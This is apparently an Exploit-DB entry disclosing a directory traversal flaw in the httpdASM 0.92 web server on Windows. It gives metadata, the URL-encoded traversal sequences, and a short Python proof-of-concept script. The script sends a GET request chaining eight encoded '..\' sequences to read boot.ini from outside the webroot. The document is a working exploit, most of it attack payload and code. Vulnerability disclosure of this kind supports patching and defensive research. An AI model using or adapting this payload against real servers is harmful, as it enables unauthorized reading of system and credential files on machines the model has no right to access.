httpdasm 0.92 - Directory Traversal

Author: John Leitch
type: remote
platform: windows
port: 
date_added: 2010-12-29  
date_updated: 2010-12-29  
verified: 1  
codes: OSVDB-70176  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-12-29-at-120237-pm.png  
application_url: http://www.exploit-db.comhttpd092.zip  

raw file: 15861.txt  
# ------------------------------------------------------------------------

# Software................httpdASM 0.92

# Vulnerability...........Directory Traversal

# Download................http://www.japheth.de/httpdASM.html

# Release Date............12/27/2010

# Tested On...............Windows XP

# ------------------------------------------------------------------------

# Author..................John Leitch

# Site....................http://www.johnleitch.net/

# Email...................john.leitch5@gmail.com

# ------------------------------------------------------------------------

#

# --Description--
#
# A directory traversal vulnerability in httpdASM 0.92 can be exploited
# to read files outside of the webroot directory.
#
#
# --Exploit--
#
# %2E%2E%5C
# %2E%2E%2F
#
#
# --PoC--



import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET /' + '%2E%2E%5C' * 8 + 'boot.ini HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n');

print s.recv(8192);